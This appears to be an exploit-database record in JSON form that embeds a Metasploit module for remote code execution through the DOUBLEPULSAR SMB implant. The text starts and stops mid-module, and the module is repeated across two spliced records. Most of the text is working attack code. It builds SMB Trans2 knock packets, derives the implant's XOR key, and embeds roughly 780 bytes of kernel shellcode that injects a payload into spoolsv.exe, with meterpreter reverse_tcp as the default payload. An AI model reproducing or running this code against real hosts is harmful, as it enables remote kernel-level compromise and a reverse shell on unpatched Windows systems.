'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-16] #"}, "lastseen": "2021-09-15T22:27:09", "differentElements": ["sourceData"], "edition": 18}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "19c42f20f55739f462c5947c734951b0", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-16T22:30:47", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", 
"1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-16T22:30:47", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T22:30:47", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
